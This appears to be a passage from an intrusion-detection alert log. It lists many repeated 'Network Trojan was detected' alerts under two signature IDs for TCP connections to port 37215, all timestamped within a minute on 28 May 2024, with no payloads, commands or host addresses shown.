          SID:2829579
          Source Port:38086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846814
          SID:2829579
          Source Port:46462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.922378
          SID:2829579
          Source Port:56262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267243
          SID:2835222
          Source Port:45936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341053
          SID:2835222
          Source Port:54648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.492864
          SID:2835222
          Source Port:54578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708318
          SID:2835222
          Source Port:54628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175945
          SID:2835222
          Source Port:33030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794209
          SID:2835222
          Source Port:54838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.368937
          SID:2835222
          Source Port:34920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334627
          SID:2835222
          Source Port:53484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744242
          SID:2829579
          Source Port:34366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402441
          SID:2829579
          Source Port:53284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923098
          SID:2829579
          Source Port:48146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146185
          SID:2829579
          Source Port:36808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170438
          SID:2835222
          Source Port:39316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892812
          SID:2835222
          Source Port:49854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.225959
          SID:2835222
          Source Port:38126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117051
          SID:2835222
          Source Port:37030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103265
          SID:2835222
          Source Port:34696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328614
          SID:2829579
          Source Port:51380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.081447
          SID:2835222
          Source Port:35458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145174
          SID:2835222
          Source Port:37660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.302147
          SID:2835222
          Source Port:55756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.613870
          SID:2829579
          Source Port:60556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.424509
          SID:2829579
          Source Port:51472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.285895
          SID:2835222
          Source Port:45536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.628807
          SID:2829579
          Source Port:34238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230215
          SID:2829579
          Source Port:60350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.926588
          SID:2829579
          Source Port:58222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208298
          SID:2835222
          Source Port:60646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298297
          SID:2829579
          Source Port:41376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.552441
          SID:2835222
          Source Port:43256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.284598
          SID:2835222
          Source Port:58442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979038
          SID:2829579
          Source Port:35606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.361477
          SID:2829579
          Source Port:51460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.238166
          SID:2829579
          Source Port:59360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551982
          SID:2835222
          Source Port:35100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530177
          SID:2835222
          Source Port:46362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842507
          SID:2829579
          Source Port:58952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.811833
          SID:2835222
          Source Port:41094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.237477
          SID:2835222
          Source Port:58156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196198
          SID:2835222
          Source Port:44554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943191
          SID:2835222
          Source Port:47826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.731111
          SID:2829579
          Source Port:54018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594295
          SID:2835222
          Source Port:36542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889191
          SID:2829579
          Source Port:34964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.421933
          SID:2835222
          Source Port:40044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605052
          SID:2835222
          Source Port:34224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841598
          SID:2829579
          Source Port:50126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064236
          SID:2835222
          Source Port:51034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191955
          SID:2829579
          Source Port:34516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.169765
          SID:2835222
          Source Port:36598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.117954
          SID:2829579
          Source Port:46144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330203
          SID:2835222
          Source Port:55800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.431338
          SID:2835222
          Source Port:58350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530185
          SID:2835222
          Source Port:35656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225765
          SID:2835222
          Source Port:42856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965017
          SID:2835222
          Source Port:48912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267944
          SID:2829579
          Source Port:48254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535387
          SID:2829579
          Source Port:56600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989411
          SID:2829579
          Source Port:60334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484565
          SID:2835222
          Source Port:50016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770250
          SID:2835222
          Source Port:43894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.083854
          SID:2835222
          Source Port:47204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322079
          SID:2829579
          Source Port:40200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497871
          SID:2835222
          Source Port:54548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.566489
          SID:2835222
          Source Port:46012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803844
          SID:2829579
          Source Port:48834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764317
          SID:2829579
          Source Port:46398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771845
          SID:2829579
          Source Port:53576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.222420
          SID:2829579
          Source Port:56482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213605
          SID:2835222
          Source Port:50514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593332
          SID:2829579
          Source Port:37364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287729
          SID:2829579
          Source Port:50580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.234066
          SID:2835222
          Source Port:41890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.945493
          SID:2835222
          Source Port:38170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796206
          SID:2835222
          Source Port:46442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.323960
          SID:2829579
          Source Port:58838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266576
          SID:2829579
          Source Port:42826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839687
          SID:2829579
          Source Port:42214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475761
          SID:2835222
          Source Port:48750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979191
          SID:2835222
          Source Port:45466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164989
          SID:2829579
          Source Port:59526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441934
          SID:2829579
          Source Port:51462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156800
          SID:2835222
          Source Port:42882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.721995
          SID:2835222
          Source Port:36032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.670048
          SID:2829579
          Source Port:55218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202726
          SID:2835222
          Source Port:40330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.693323
          SID:2829579
          Source Port:42124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652955
          SID:2835222
          Source Port:43550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483728
          SID:2835222
          Source Port:49166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806272
          SID:2829579
          Source Port:41790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.993064
          SID:2835222
          Source Port:47564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188062
          SID:2835222
          Source Port:45276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.602484
          SID:2829579
          Source Port:51138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156204
          SID:2829579
          Source Port:53276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710997
          SID:2835222
          Source Port:38032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878310
          SID:2829579
          Source Port:40580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466535
          SID:2829579
          Source Port:52728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537537
          SID:2829579
          Source Port:37530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795245
          SID:2835222
          Source Port:55204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.751517
          SID:2835222
          Source Port:42414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271168
          SID:2829579
          Source Port:47676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131766
          SID:2829579
          Source Port:57948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102237
          SID:2835222
          Source Port:56392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943181
          SID:2829579
          Source Port:45842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187442
          SID:2835222
          Source Port:36388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.087317
          SID:2835222
          Source Port:47176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.925618
          SID:2835222
          Source Port:50502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271410
          SID:2835222
          Source Port:38198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227600
          SID:2829579
          Source Port:40252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976436
          SID:2829579
          Source Port:38926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511296
          SID:2835222
          Source Port:54852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.492828
          SID:2835222
          Source Port:59542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305705
          SID:2835222
          Source Port:45660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463538
          SID:2835222
          Source Port:45384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267288
          SID:2835222
          Source Port:51356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152852
          SID:2835222
          Source Port:34768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794220
          SID:2835222
          Source Port:43694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.626756
          SID:2829579
          Source Port:34826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473672
          SID:2829579
          Source Port:44830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102805
          SID:2829579
          Source Port:51458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.276967
          SID:2829579
          Source Port:44306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268597
          SID:2835222
          Source Port:48358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745620
          SID:2835222
          Source Port:51164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818201
          SID:2829579
          Source Port:43902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.663382
          SID:2835222
          Source Port:49484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339710
          SID:2835222
          Source Port:54248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266223
          SID:2835222
          Source Port:59568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.591165
          SID:2829579
          Source Port:59230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960657
          SID:2835222
          Source Port:34676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299010
          SID:2835222
          Source Port:60166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115571
          SID:2829579
          Source Port:51726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548528
          SID:2835222
          Source Port:59448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195988
          SID:2829579
          Source Port:38624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943984
          SID:2835222
          Source Port:47756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170431
          SID:2829579
          Source Port:55692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464339
          SID:2835222
          Source Port:36890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756762
          SID:2835222
          Source Port:43148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804596
          SID:2835222
          Source Port:48774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.923792
          SID:2835222
          Source Port:59390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.010447
          SID:2835222
          Source Port:47150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.931408
          SID:2835222
          Source Port:50900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183745
          SID:2829579
          Source Port:47110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352480
          SID:2829579
          Source Port:34124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.075830
          SID:2829579
          Source Port:47548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.291085
          SID:2835222
          Source Port:33260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.327693
          SID:2835222
          Source Port:44618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742301
          SID:2835222
          Source Port:34082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.242581
          SID:2829579
          Source Port:60628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.808549
          SID:2835222
          Source Port:37614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.811326
          SID:2829579
          Source Port:45564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774127
          SID:2835222
          Source Port:47182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941648
          SID:2835222
          Source Port:42654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298145
          SID:2829579
          Source Port:35708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463432
          SID:2835222
          Source Port:38664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138083
          SID:2829579
          Source Port:59900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.080875
          SID:2835222
          Source Port:44916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943332
          SID:2829579
          Source Port:33568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.241144
          SID:2829579
          Source Port:41230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326352
          SID:2829579
          Source Port:37264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441427
          SID:2835222
          Source Port:44820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.319116
          SID:2829579
          Source Port:44260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.811786
          SID:2835222
          Source Port:45180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722378
          SID:2835222
          Source Port:59878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273170
          SID:2835222
          Source Port:53156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923494
          SID:2829579
          Source Port:54714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.159747
          SID:2829579
          Source Port:59800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441627
          SID:2835222
          Source Port:37630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.020477
          SID:2829579
          Source Port:41556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.493014
          SID:2835222
          Source Port:58838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.219206
          SID:2835222
          Source Port:55388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.034026
          SID:2835222
          Source Port:44928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735515
          SID:2829579
          Source Port:54064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293087
          SID:2835222
          Source Port:55258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195300
          SID:2835222
          Source Port:35204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328474
          SID:2829579
          Source Port:33322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666628
          SID:2829579
          Source Port:36086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352448
          SID:2829579
          Source Port:43840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.498893
          SID:2829579
          Source Port:52366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.772902
          SID:2829579
          Source Port:38892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804578
          SID:2835222
          Source Port:53822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.299379
          SID:2835222
          Source Port:50150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213625
          SID:2835222
          Source Port:51930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.615314
          SID:2835222
          Source Port:45218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946898
          SID:2829579
          Source Port:59150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.119121
          SID:2829579
          Source Port:40070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297277
          SID:2835222
          Source Port:51002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.626846
          SID:2829579
          Source Port:43868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727947
          SID:2835222
          Source Port:47864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.153056
          SID:2835222
          Source Port:39902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.691592
          SID:2835222
          Source Port:53146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710277
          SID:2829579
          Source Port:58084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591575
          SID:2835222
          Source Port:38048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.596946
          SID:2835222
          Source Port:41188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770705
          SID:2835222
          Source Port:35054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178513
          SID:2835222
          Source Port:48700
          Destination Port:37215
